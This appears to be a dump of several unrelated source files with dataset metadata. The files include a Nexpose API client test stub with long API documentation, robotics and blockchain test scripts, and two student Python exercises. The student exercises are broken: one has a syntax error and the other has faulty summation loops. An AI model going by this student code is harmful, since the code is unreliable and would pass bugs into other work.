(instant) the value is converted to UTC. For example: | Value | Format | Example | | --------------- | ------------------------------ | --------------------- | | Date | `YYYY-MM-DD` | 2017-12-03 | | Date & Time | `YYYY-MM-DD'T'hh:mm:ss[.nnn]Z` | 2017-12-03T10:15:30Z | #### Content In some resources a Content data type is used. This allows for multiple formats of representation to be returned within resource, specifically `\"html\"` and `\"text\"`. The `\"text\"` property returns a flattened representation suitable for output in textual displays. The `\"html\"` property returns an HTML fragment suitable for display within an HTML element. Note, the HTML returned is not a valid stand-alone HTML document. #### Paging The response to a paginated request follows the format: ```json { resources\": [ ... ], \"page\": { \"number\" : ..., \"size\" : ..., \"totalResources\" : ..., \"totalPages\" : ... }, \"links\": [ \"first\" : { \"href\" : \"...\" }, \"prev\" : { \"href\" : \"...\" }, \"self\" : { \"href\" : \"...\" }, \"next\" : { \"href\" : \"...\" }, \"last\" : { \"href\" : \"...\" } ] } ``` The `resources` property is an array of the resources being retrieved from the endpoint, each which should contain at minimum a \"self\" relation hypermedia link. The `page` property outlines the details of the current page and total possible pages. The object for the page includes the following properties: - number - The page number (zero-based) of the page returned. - size - The size of the pages, which is less than or equal to the maximum page size. - totalResources - The total amount of resources available across all pages. - totalPages - The total amount of pages. The last property of the paged response is the `links` array, which contains all available hypermedia links. For paginated responses, the \"self\", \"next\", \"previous\", \"first\", and \"last\" links are returned. The \"self\" link must always be returned and should contain a link to allow the client to replicate the original request against the collection resource in an identical manner to that in which it was invoked. The \"next\" and \"previous\" links are present if either or both there exists a previous or next page, respectively. The \"next\" and \"previous\" links have hrefs that allow \"natural movement\" to the next page, that is all parameters required to move the next page are provided in the link. The \"first\" and \"last\" links provide references to the first and last pages respectively. Requests outside the boundaries of the pageable will result in a `404 NOT FOUND`. Paginated requests do not provide a \"stateful cursor\" to the client, nor does it need to provide a read consistent view. Records in adjacent pages may change while pagination is being traversed, and the total number of pages and resources may change between requests within the same filtered/queries resource collection. #### Property Views The \"depth\" of the response of a resource can be configured using a \"view\". All endpoints supports two views that can tune the extent of the information returned in the resource. The supported views are `summary` and `details` (the default). View are specified using a query parameter, in this format: ```bash /<resource>?view={viewName} ``` #### Error Any error responses can provide a response body with a message to the client indicating more information (if applicable) to aid debugging of the error. All 40x and 50x responses will return an error response in the body. The format of the response is as follows: ```json { \"status\": <statusCode>, \"message\": <message>, \"links\" : [ { \"rel\" : \"...\", \"href\" : \"...\" } ] } ``` The `status` property is the same as the HTTP status returned in the response, to ease client parsing. The message property is a localized message in the request client's locale (if applicable) that articulates the nature of the error. The last property is the `links` property. This may contain additional [hypermedia links](#section/Overview/Authentication) to troubleshoot. #### Search Criteria <a section=\"section/Responses/SearchCriteria\"></a> Multiple resources make use of search criteria to match assets. Search criteria is an array of search filters. Each search filter has a generic format of: ```json { \"field\": \"<field-name>\", \"operator\": \"<operator>\", [\"value\": \"<value>\",] [\"lower\": \"<value>\",] [\"upper\": \"<value>\"] } ``` Every filter defines two required properties `field` and `operator`. The field is the name of an asset property that is being filtered on. The operator is a type and property-specific operating performed on the filtered property. The valid values for fields and operators are outlined in the table below. Every filter also defines one or more values that are supplied to the operator. The valid values vary by operator and are outlined below. ##### Fields The following table outlines the search criteria fields and the available operators: | Field | Operators | | --------------------------------- | ------------------------------------------------------------------------------------------------------------------------------ | | `alternate-address-type` | `in` | | `container-image` | `is` ` is not` ` starts with` ` ends with` ` contains` ` does not contain` ` is like` ` not like` | | `container-status` | `is` ` is not` | | `containers` | `are` | | `criticality-tag` | `is` ` is not` ` is greater than` ` is less than` ` is applied` ` is not applied` | | `custom-tag` | `is` ` is not` ` starts with` ` ends with` ` contains` ` does not contain` ` is applied` ` is not applied` | | `cve` | `is` ` is not` ` contains` ` does not contain` | | `cvss-access-complexity` | `is` ` is not` | | `cvss-authentication-required` | `is` ` is not` | | `cvss-access-vector` | `is` ` is not` | | `cvss-availability-impact` | `is` ` is not` | | `cvss-confidentiality-impact` | `is` ` is not` | | `cvss-integrity-impact` | `is` ` is not` | | `cvss-v3-confidentiality-impact` | `is` ` is not` | | `cvss-v3-integrity-impact` | `is` ` is not` | | `cvss-v3-availability-impact` | `is` ` is not` | | `cvss-v3-attack-vector` | `is` ` is not` | | `cvss-v3-attack-complexity` | `is` ` is not` | | `cvss-v3-user-interaction` | `is` ` is not` | | `cvss-v3-privileges-required` | `is` ` is not` | | `host-name` | `is` ` is not` ` starts with` ` ends with` ` contains` ` does not contain` ` is empty` ` is not empty` ` is like` ` not like` | | `host-type` | `in` ` not in` | | `ip-address` | `is` ` is not` ` in range` ` not in range` ` is like` ` not like` | | `ip-address-type` | `in` ` not in` | | `last-scan-date` | `is-on-or-before` ` is on or after` ` is between` ` is earlier than` ` is within the last` | | `location-tag` | `is` ` is not` ` starts with` ` ends with` ` contains` ` does not contain` ` is applied` ` is not applied` | | `mobile-device-last-sync-time` | `is-within-the-last` ` is earlier than` | | `open-ports` | `is` ` is not` ` in range` | | `operating-system` | `contains` ` does not contain` ` is empty` ` is not empty` | | `owner-tag` | `is` ` is not` ` starts with` ` ends with` ` contains` ` does not contain` ` is applied` ` is not applied` | | `pci-compliance` | `is` | | `risk-score` | `is` ` is not` ` in range` ` greater than` ` less than` | | `service-name` | `contains` ` does not contain` | | `site-id` | `in` ` not in` | | `software` | `contains` ` does not contain` | | `vAsset-cluster` | `is` ` is not` ` contains` ` does not contain` ` starts with` | | `vAsset-datacenter` | `is` ` is not` | | `vAsset-host-name` | `is` ` is not` ` contains` ` does not contain` ` starts with` | | `vAsset-power-state` | `in` ` not in` | | `vAsset-resource-pool-path` | `contains` ` does not contain` | | `vulnerability-assessed` | `is-on-or-before` ` is on or after` ` is between` ` is earlier than` ` is within the last` | | `vulnerability-category` | `is` ` is not` ` starts with` ` ends with` ` contains` ` does not contain` | | `vulnerability-cvss-v3-score` | `is` ` is not` | | `vulnerability-cvss-score` | `is` ` is not` ` in range` ` is greater than` ` is less than` | | `vulnerability-exposures` | `includes` ` does not include` | | `vulnerability-title` | `contains` ` does not contain` ` is` ` is not` ` starts with` ` ends with` | | `vulnerability-validated-status` | `are` | ##### Enumerated Properties The following fields have enumerated values: | Field | Acceptable Values | | ----------------------------------------- | ------------------------------------------------------------------------------------------------------------- | | `alternate-address-type` | 0=IPv4, 1=IPv6 | | `containers` | 0=present, 1=not present | | `container-status` | `created` `running` `paused` `restarting` `exited` `dead` `unknown` | | `cvss-access-complexity` | <ul><li><code>L</code> = Low</li><li><code>M</code> = Medium</li><li><code>H</code> = High</li></ul> | | `cvss-integrity-impact` | <ul><li><code>N</code> = None</li><li><code>P</code> = Partial</li><li><code>C</code> = Complete</li></ul> | | `cvss-confidentiality-impact` | <ul><li><code>N</code> = None</li><li><code>P</code> = Partial</li><li><code>C</code> = Complete</li></ul> | | `cvss-availability-impact` | <ul><li><code>N</code> = None</li><li><code>P</code> = Partial</li><li><code>C</code> = Complete</li></ul> | | `cvss-access-vector` | <ul><li><code>L</code> = Local</li><li><code>A</code> = Adjacent</li><li><code>N</code> = Network</li></ul> | | `cvss-authentication-required` | <ul><li><code>N</code> = None</li><li><code>S</code> = Single</li><li><code>M</code> = Multiple</li></ul> | | `cvss-v3-confidentiality-impact` | <ul><li><code>L</code> = Local</li><li><code>L</code> = Low</li><li><code>N</code> = None</li><li><code>H</code> = High</li></ul> | | `cvss-v3-integrity-impact` | <ul><li><code>L</code> = Local</li><li><code>L</code> = Low</li><li><code>N</code> = None</li><li><code>H</code> = High</li></ul> | | `cvss-v3-availability-impact` | <ul><li><code>N</code> = None</li><li><code>L</code> = Low</li><li><code>H</code> = High</li></ul> | | `cvss-v3-attack-vector` | <ul><li><code>N</code> = Network</li><li><code>A</code> = Adjacent</li><li><code>L</code> = Local</li><li><code>P</code> = Physical</li></ul> | | `cvss-v3-attack-complexity` | <ul><li><code>L</code> = Low</li><li><code>H</code> = High</li></ul> | | `cvss-v3-user-interaction` | <ul><li><code>N</code> = None</li><li><code>R</code> = Required</li></ul> | | `cvss-v3-privileges-required` | <ul><li><code>N</code> = None</li><li><code>L</code> = Low</li><li><code>H</code> = High</li></ul> | | `host-type` | 0=Unknown, 1=Guest, 2=Hypervisor, 3=Physical, 4=Mobile | | `ip-address-type` | 0=IPv4, 1=IPv6 | | `pci-compliance` | 0=fail, 1=pass | | `vulnerability-validated-status` | 0=present, 1=not present | ##### Operator Properties <a section=\"section/Responses/SearchCriteria/OperatorProperties\"></a> The following table outlines which properties are required for each operator and the appropriate data type(s): | Operator | `value` | `lower` | `upper` | | ----------------------|-----------------------|-----------------------|-----------------------| | `are` | `string` | | | | `contains` | `string` | | | | `does-not-contain` | `string` | | | | `ends with` | `string` | | | | `in` | `Array[ string ]` | | | | `in-range` | | `numeric` | `numeric` | | `includes` | `Array[ string ]` | | | | `is` | `string` | | | | `is-applied` | | | | | `is-between` | | `numeric` | `numeric` | | `is-earlier-than` | `numeric` | | | | `is-empty` | | | | | `is-greater-than` | `numeric` | | | | `is-on-or-after` | `string` (yyyy-MM-dd) | | | | `is-on-or-before` | `string` (yyyy-MM-dd) | | | | `is-not` | `string` | | | | `is-not-applied` | | | | | `is-not-empty` | | | | | `is-within-the-last` | `string` | | | | `less-than` | `string` | | | | `like` | `string` | | | | `not-contains` | `string` | | | | `not-in` | `Array[ string ]` | | | | `not-in-range` | | `numeric` | `numeric` | | `not-like` | `string` | | | | `starts-with` | `string` | | | #### Discovery Connection Search Criteria <a section=\"section/Responses/DiscoverySearchCriteria\"></a> Dynamic sites make use of search criteria to match assets from a discovery connection. Search criteria is an array of search filters. Each search filter has a generic format of: ```json { \"field\": \"<field-name>\", \"operator\": \"<operator>\", [\"value\": \"<value>\",] [\"lower\": \"<value>\",] [\"upper\": \"<value>\"] } ``` Every filter defines two required properties `field` and `operator`. The field is the name of an asset property that is being filtered on. The list of supported fields vary depending on the type of discovery connection configured for the dynamic site (e.g vSphere, ActiveSync, etc.). The operator is a type and property-specific operating performed on the filtered property. The valid values for fields outlined in the tables below and are grouped by the type of connection. Every filter also defines one or more values that are supplied to the operator. See <a href=\"#section/Responses/SearchCriteria/OperatorProperties\">Search Criteria Operator Properties</a> for more information on the valid values for each operator. ##### Fields (ActiveSync) This section documents search criteria information for ActiveSync discovery connections. The discovery connections must be one of the following types: `\"activesync-ldap\"`, `\"activesync-office365\"`, or `\"activesync-powershell\"`. The following table outlines the search criteria fields and the available operators for ActiveSync connections: | Field | Operators | | --------------------------------- | ------------------------------------------------------------- | | `last-sync-time` | `is-within-the-last` ` is-earlier-than` | | `operating-system` | `contains` ` does-not-contain` | | `user` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | ##### Fields (AWS) This section documents search criteria information for AWS discovery connections. The discovery connections must be the type `\"aws\"`. The following table outlines the search criteria fields and the available operators for AWS connections: | Field | Operators | | ----------------------- | ------------------------------------------------------------- | | `availability-zone` | `contains` ` does-not-contain` | | `guest-os-family` | `contains` ` does-not-contain` | | `instance-id` | `contains` ` does-not-contain` | | `instance-name` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `instance-state` | `in` ` not-in` | | `instance-type` | `in` ` not-in` | | `ip-address` | `in-range` ` not-in-range` ` is` ` is-not` | | `region` | `in` ` not-in` | | `vpc-id` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | ##### Fields (DHCP) This section documents search criteria information for DHCP discovery connections. The discovery connections must be the type `\"dhcp\"`. The following table outlines the search criteria fields and the available operators for DHCP connections: | Field | Operators | | --------------- | ------------------------------------------------------------- | | `host-name` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `ip-address` | `in-range` ` not-in-range` ` is` ` is-not` | | `mac-address` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | ##### Fields (Sonar) This section documents search criteria information for Sonar discovery connections. The discovery connections must be the type `\"sonar\"`. The following table outlines the search criteria fields and the available operators for Sonar connections: | Field | Operators | | ------------------- | -------------------- | | `search-domain` | `contains` ` is` | | `ip-address` | `in-range` ` is` | | `sonar-scan-date` | `is-within-the-last` | ##### Fields (vSphere) This section documents search criteria information for vSphere discovery connections. The discovery connections must be the type `\"vsphere\"`. The following table outlines the search criteria fields and the available operators for vSphere connections: | Field | Operators | | -------------------- | ------------------------------------------------------------------------------------------ | | `cluster` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `data-center` | `is` ` is-not` | | `discovered-time` | `is-on-or-before` ` is-on-or-after` ` is-between` ` is-earlier-than` ` is-within-the-last` | | `guest-os-family` | `contains` ` does-not-contain` | | `host-name` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `ip-address` | `in-range` ` not-in-range` ` is` ` is-not` | | `power-state` | `in` ` not-in` | | `resource-pool-path` | `contains` ` does-not-contain` | | `last-time-seen` | `is-on-or-before` ` is-on-or-after` ` is-between` ` is-earlier-than` ` is-within-the-last` | | `vm` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | ##### Enumerated Properties (vSphere) The following fields have enumerated values: | Field | Acceptable Values | | ------------- | ------------------------------------ | | `power-state` | `poweredOn` `poweredOff` `suspended` | ## HATEOAS This API follows Hypermedia as the Engine of Application State (HATEOAS) principals and is therefore hypermedia friendly. Hyperlinks are returned in the `links` property of any given resource and contain a fully-qualified hyperlink to the corresponding resource. The format of the hypermedia link adheres to both the <a target=\"_blank\" href=\"http://jsonapi.org\">{json:api} v1</a> <a target=\"_blank\" href=\"http://jsonapi.org/format/#document-links\">\"Link Object\"</a> and <a target=\"_blank\" href=\"http://json-schema.org/latest/json-schema-hypermedia.html\">JSON Hyper-Schema</a> <a target=\"_blank\" href=\"http://json-schema.org/latest/json-schema-hypermedia.html#rfc.section.5.2\">\"Link Description Object\"</a> formats. For example: ```json \"links\": [{ \"rel\": \"<relation>\", \"href\": \"<href>\" ... }] ``` Where appropriate link objects may also contain additional properties than the `rel` and `href` properties, such as `id`, `type`, etc. See the [Root](#tag/Root) resources for the entry points into API discovery. # noqa: E501
OpenAPI spec version: 3
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import nexpose_client
from nexpose_client.models.token_resource import TokenResource # noqa: E501
from nexpose_client.rest import ApiException
class TestTokenResource(unittest.TestCase):
"""TokenResource unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testTokenResource(self):
"""Test TokenResource"""
# FIXME: construct object with mandatory attributes with example values
# model = nexpose_client.models.token_resource.TokenResource() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
e2bd9a59636cfd0c2f76a1a4087cc2c5202b1935 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/216/usersdata/274/113966/submittedfiles/av2_p3_civil.py | d9f4bcefea50acc8b1dd920d630cdd854f8a3254 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 458 | py | # -*- coding: utf-8 -*-
import numpy as np
L=int(input("Quantidade de Linhas: "))
C=L
a=np.zeros((L,C))
x=int(input("Linhas: "))
y=int(input("Colunas: "))
for i in range(0,a.shape[0],1):
for j in range(0,a.shape[1],1):
a[i,j]=float(input("Valor da Linha: "))
soma1L=0
for i in range(x,C-y,1):
soma1L=soma1L+a[x,i+1]
soma2L=0
for i in range(x,y,1):
soma2L=soma2L+a
soma1C=0
for i in range(x,C-y,1):
soma1C=soma1C+a[x,i+1]
| [
"[email protected]"
] | |
fe03327e97fff1983eaee4dd0427062b9d600377 | 05cda3ab89d001aef2ec19f2975fad9397c8dd0b | /experiments/sawyer/towel_classifier/conf.py | bec399b3897f8ecb885707dcf2e8c6335cc1ab37 | [
"MIT"
] | permissive | dhl8282/visual_foresight | ddcc940ad542222d433ca269e37e4d5f747732ea | 5e6205a85119c1dec4a39ba7e67d7c89e726a47c | refs/heads/master | 2022-09-05T18:16:07.590072 | 2020-05-26T08:41:52 | 2020-05-26T08:41:52 | 266,988,765 | 0 | 0 | MIT | 2020-05-26T08:36:22 | 2020-05-26T08:36:22 | null | UTF-8 | Python | false | false | 988 | py | from visual_mpc.video_prediction.setup_predictor import setup_predictor
from visual_mpc.video_prediction.vpred_model_interface import VPred_Model_Interface
from video_prediction.models.savp_model import SAVPVideoPredictionModel
import robonet
modeldir = '/home/sudeep/Documents/video_prediction/pretrained_models/mixed_datasets/towel_hard_objects/view0/'
configuration = {
'pred_model': VPred_Model_Interface,
'pred_model_class': SAVPVideoPredictionModel,
'setup_predictor':setup_predictor,
'json_dir': modeldir + '/model.savp.None',
'pretrained_model':modeldir + '/model.savp.None/model-300000', # 'filepath of a pretrained model to resume training from.' ,
'sequence_length': 15, # 'sequence length to load, including context frames.' ,
'context_frames': 2, # of frames before predictions.' ,
'model': 'appflow', #'model architecture to use - CDNA, DNA, or STP' ,
'batch_size': 50,
'sdim':8,
'adim':4,
'orig_size':[48,64],
'no_pix_distrib': '',
'ncam': 1
}
| [
"[email protected]"
] | |
9d8c079179f285f75f1695a88d4e3807acf800c1 | ced968634cb9c6ee4677cd747b02b0a656ba3221 | /env/bin/easy_install | 98cbe45bf86c8f2fafe9ddf8b0ac9682e7acd4e4 | [] | no_license | veganna/hori | ad5c171fd0ea936f047cc375991e9f7a438df7ab | 92e195d9844e08bd9c9cbbbb4d1e1e6eef738461 | refs/heads/main | 2023-09-02T05:53:50.756717 | 2021-11-07T18:12:09 | 2021-11-07T18:12:09 | 425,580,033 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 244 | #!/home/mainsite/env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
78278e990a57092f2ec56732405baf87e7f9f84d | 1fe8d4133981e53e88abf633046060b56fae883e | /venv/lib/python3.8/site-packages/tensorflow/python/layers/normalization.py | 2ff79b4f2e9ffe0a6b49bfc40e106c0aa66daffd | [] | no_license | Akira331/flask-cifar10 | 6c49db8485038731ce67d23f0972b9574746c7a7 | 283e7a2867c77d4b6aba7aea9013bf241d35d76c | refs/heads/master | 2023-06-14T16:35:06.384755 | 2021-07-05T14:09:15 | 2021-07-05T14:09:15 | 382,864,970 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:6ba7d44e910c3440fadfac158cda4aa0136a4447c84f005b7144e6cd9b29444d
size 17101
| [
"[email protected]"
] | |
85ae43871dcc3db57959c181396ab5c178961f2e | 330285bea42e66b1975d62e2f4dd742d4c3ab360 | /franka_moveit/scripts/create_demo_planning_scene.py | 9916a164cc43bf4866b219c232f5d029ec8d94c9 | [
"Apache-2.0"
] | permissive | justagist/franka_ros_interface | 946182e0430d21a9c119470729d7ec5e96caa404 | f1f3649a4b030a9191e0577d980680ec95afa6ab | refs/heads/master | 2021-12-24T22:22:14.599033 | 2021-12-22T13:42:30 | 2021-12-22T13:42:30 | 199,485,892 | 130 | 51 | Apache-2.0 | 2021-05-03T17:11:32 | 2019-07-29T16:07:08 | Python | UTF-8 | Python | false | false | 3,226 | py | #!/usr/bin/env python
# /***************************************************************************
#
# @package: franka_moveit
# @metapackage: franka_ros_interface
# @author: Saif Sidhik <[email protected]>
#
# **************************************************************************/
# /***************************************************************************
# Copyright (c) 2019-2021, Saif Sidhik
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# **************************************************************************/
import sys
import rospy
import moveit_commander
from franka_moveit import ExtendedPlanningSceneInterface
from franka_moveit.utils import create_pose_stamped_msg
"""
A script for creating a simple environment as a PlanningScene. This script runs
by default when interface.launch is started, but can be disabled using argument.
"""
IRLab_workspace = [
{
'name': 'back_wall',
'pose': create_pose_stamped_msg(position = [-0.57,0.0,0.5], orientation = [1,0,0,0], frame = 'panda_link0'),
'size': [0.1,1.8,1]
},
{
'name': 'side_wall',
'pose': create_pose_stamped_msg(position = [-0.3,-0.85,0.5], orientation = [1,0,0,0], frame = 'panda_link0'),
'size': [0.6,0.1,1]
},
{
'name': 'table',
'pose': create_pose_stamped_msg(position = [0.45,-0.0,0], orientation = [1,0,0,0], frame = 'panda_link0'),
'size': [2,1.8,0.02]
},
{
'name': 'controller_box',
'pose': create_pose_stamped_msg(position = [-0.37,0.55,0.08], orientation = [1,0,0,0], frame = 'panda_link0'),
'size': [0.4,0.6,0.16]
},
{
'name': 'equipment_box',
'pose': create_pose_stamped_msg(position = [-0.35,-0.68,0.17], orientation = [1,0,0,0], frame = 'panda_link0'),
'size': [0.46,0.4,0.34]
}
]
def main():
try:
rospy.loginfo("Creating Demo Planning Scene")
scene = ExtendedPlanningSceneInterface()
rospy.sleep(1) # ----- Not having this delay sometimes caused failing to create some boxes
for config in IRLab_workspace:
rospy.loginfo("-- Creating object: {}..".format(config['name']))
success = scene.add_box(**config)
rospy.loginfo("------ {}".format("success" if success else "FAILED!"))
rospy.loginfo("Created Demo Planning Scene.")
except rospy.ROSInterruptException:
return
except KeyboardInterrupt:
return
if __name__ == '__main__':
rospy.init_node('simple_scene_creator',
anonymous=True)
moveit_commander.roscpp_initialize(sys.argv)
main()
| [
"[email protected]"
] | |
c9905c4f0826bb701e09958514299e45c73b5843 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/173/usersdata/265/86697/submittedfiles/moedas.py | a742b7f67e4b1843dcb579ac41fef535ec50768c | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 300 | py | # -*- coding: utf-8 -*-
a = int(input('digite o valor de a: '))
b = int(input('digite o valor de b: '))
c = int(input('digite o valor de c: '))
for qa in range (0,c,1):
if (((c-(qa*a))%)b==0):
print(qa)
qb=(c-(qa*a))//b
print(qb)
break
else:
print('N') | [
"[email protected]"
] | |
e0e94e4d38d76f3390d1bccd9905611afc425cc0 | 692f9d0f891fa670c56d88b96312c8295fcf06b3 | /olivemain/tests/core/full_node/full_sync/test_full_sync.py | a5dba0bbfdcc896e275950cd9f6b04545b81cccc | [
"Apache-2.0"
] | permissive | aisuyi065/Olive-blockchain | 97302c1002eb140957fa57eb1932f683847b4d64 | a4f5d48597af90343279597a81fd6441f4de9223 | refs/heads/main | 2023-06-30T04:41:09.882393 | 2021-08-07T03:53:27 | 2021-08-07T03:53:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,659 | py | # flake8: noqa: F811, F401
import asyncio
import logging
import time
from typing import List
import pytest
from olive.full_node.weight_proof import _validate_sub_epoch_summaries
from olive.protocols import full_node_protocol
from olive.types.blockchain_format.sub_epoch_summary import SubEpochSummary
from olive.types.full_block import FullBlock
from olive.types.peer_info import PeerInfo
from olive.util.hash import std_hash
from olive.util.ints import uint16
from tests.core.fixtures import default_400_blocks, default_1000_blocks, default_10000_blocks, empty_blockchain
from tests.core.node_height import node_height_exactly, node_height_between
from tests.setup_nodes import bt, self_hostname, setup_n_nodes, setup_two_nodes, test_constants
from tests.time_out_assert import time_out_assert
@pytest.fixture(scope="session")
def event_loop():
loop = asyncio.get_event_loop()
yield loop
log = logging.getLogger(__name__)
class TestFullSync:
@pytest.fixture(scope="function")
async def two_nodes(self):
async for _ in setup_two_nodes(test_constants):
yield _
@pytest.fixture(scope="function")
async def three_nodes(self):
async for _ in setup_n_nodes(test_constants, 3):
yield _
@pytest.fixture(scope="function")
async def four_nodes(self):
async for _ in setup_n_nodes(test_constants, 4):
yield _
@pytest.fixture(scope="function")
async def five_nodes(self):
async for _ in setup_n_nodes(test_constants, 5):
yield _
@pytest.mark.asyncio
async def test_long_sync_from_zero(self, five_nodes, default_400_blocks):
# Must be larger than "sync_block_behind_threshold" in the config
num_blocks = len(default_400_blocks)
blocks: List[FullBlock] = default_400_blocks
full_node_1, full_node_2, full_node_3, full_node_4, full_node_5 = five_nodes
server_1 = full_node_1.full_node.server
server_2 = full_node_2.full_node.server
server_3 = full_node_3.full_node.server
server_4 = full_node_4.full_node.server
server_5 = full_node_5.full_node.server
# If this constant is changed, update the tests to use more blocks
assert test_constants.WEIGHT_PROOF_RECENT_BLOCKS < 400
# Syncs up less than recent blocks
for block in blocks[: test_constants.WEIGHT_PROOF_RECENT_BLOCKS - 5]:
await full_node_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
await server_2.start_client(
PeerInfo(self_hostname, uint16(server_1._port)), on_connect=full_node_2.full_node.on_connect
)
# The second node should eventually catch up to the first one
await time_out_assert(
150, node_height_exactly, True, full_node_2, test_constants.WEIGHT_PROOF_RECENT_BLOCKS - 5 - 1
)
for block in blocks[
test_constants.WEIGHT_PROOF_RECENT_BLOCKS - 5 : test_constants.WEIGHT_PROOF_RECENT_BLOCKS + 5
]:
await full_node_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
await server_3.start_client(
PeerInfo(self_hostname, uint16(server_1._port)), on_connect=full_node_3.full_node.on_connect
)
timeout_seconds = 150
# Node 3 and Node 2 sync up to node 1
await time_out_assert(
timeout_seconds, node_height_exactly, True, full_node_2, test_constants.WEIGHT_PROOF_RECENT_BLOCKS + 5 - 1
)
await time_out_assert(
timeout_seconds, node_height_exactly, True, full_node_3, test_constants.WEIGHT_PROOF_RECENT_BLOCKS + 5 - 1
)
cons = list(server_1.all_connections.values())[:]
for con in cons:
await con.close()
for block in blocks[test_constants.WEIGHT_PROOF_RECENT_BLOCKS + 5 :]:
await full_node_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
await server_2.start_client(
PeerInfo(self_hostname, uint16(server_1._port)), on_connect=full_node_2.full_node.on_connect
)
await server_3.start_client(
PeerInfo(self_hostname, uint16(server_1._port)), on_connect=full_node_3.full_node.on_connect
)
await server_4.start_client(
PeerInfo(self_hostname, uint16(server_1._port)), on_connect=full_node_4.full_node.on_connect
)
await server_3.start_client(
PeerInfo(self_hostname, uint16(server_2._port)), on_connect=full_node_3.full_node.on_connect
)
await server_4.start_client(
PeerInfo(self_hostname, uint16(server_3._port)), on_connect=full_node_4.full_node.on_connect
)
await server_4.start_client(
PeerInfo(self_hostname, uint16(server_2._port)), on_connect=full_node_4.full_node.on_connect
)
# All four nodes are synced
await time_out_assert(timeout_seconds, node_height_exactly, True, full_node_1, num_blocks - 1)
await time_out_assert(timeout_seconds, node_height_exactly, True, full_node_2, num_blocks - 1)
await time_out_assert(timeout_seconds, node_height_exactly, True, full_node_3, num_blocks - 1)
await time_out_assert(timeout_seconds, node_height_exactly, True, full_node_4, num_blocks - 1)
# Deep reorg, fall back from batch sync to long sync
blocks_node_5 = bt.get_consecutive_blocks(60, block_list_input=blocks[:350], seed=b"node5")
for block in blocks_node_5:
await full_node_5.full_node.respond_block(full_node_protocol.RespondBlock(block))
await server_5.start_client(
PeerInfo(self_hostname, uint16(server_1._port)), on_connect=full_node_5.full_node.on_connect
)
await time_out_assert(timeout_seconds, node_height_exactly, True, full_node_5, 409)
await time_out_assert(timeout_seconds, node_height_exactly, True, full_node_1, 409)
@pytest.mark.asyncio
async def test_sync_from_fork_point_and_weight_proof(self, three_nodes, default_1000_blocks, default_400_blocks):
start = time.time()
# Must be larger than "sync_block_behind_threshold" in the config
num_blocks_initial = len(default_1000_blocks) - 50
blocks_950 = default_1000_blocks[:num_blocks_initial]
blocks_rest = default_1000_blocks[num_blocks_initial:]
blocks_400 = default_400_blocks
full_node_1, full_node_2, full_node_3 = three_nodes
server_1 = full_node_1.full_node.server
server_2 = full_node_2.full_node.server
server_3 = full_node_3.full_node.server
for block in blocks_950:
await full_node_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Node 2 syncs from halfway
for i in range(int(len(default_1000_blocks) / 2)):
await full_node_2.full_node.respond_block(full_node_protocol.RespondBlock(default_1000_blocks[i]))
# Node 3 syncs from a different blockchain
for block in blocks_400:
await full_node_3.full_node.respond_block(full_node_protocol.RespondBlock(block))
await server_2.start_client(PeerInfo(self_hostname, uint16(server_1._port)), full_node_2.full_node.on_connect)
await server_3.start_client(PeerInfo(self_hostname, uint16(server_1._port)), full_node_3.full_node.on_connect)
# Also test request proof of weight
# Have the request header hash
res = await full_node_1.request_proof_of_weight(
full_node_protocol.RequestProofOfWeight(blocks_950[-1].height + 1, blocks_950[-1].header_hash)
)
assert res is not None
validated, _, _ = await full_node_1.full_node.weight_proof_handler.validate_weight_proof(
full_node_protocol.RespondProofOfWeight.from_bytes(res.data).wp
)
assert validated
# Don't have the request header hash
res = await full_node_1.request_proof_of_weight(
full_node_protocol.RequestProofOfWeight(blocks_950[-1].height + 1, std_hash(b"12"))
)
assert res is None
# The second node should eventually catch up to the first one, and have the
# same tip at height num_blocks - 1
await time_out_assert(180, node_height_exactly, True, full_node_2, num_blocks_initial - 1)
await time_out_assert(180, node_height_exactly, True, full_node_3, num_blocks_initial - 1)
def fn3_is_not_syncing():
return not full_node_3.full_node.sync_store.get_sync_mode()
await time_out_assert(180, fn3_is_not_syncing)
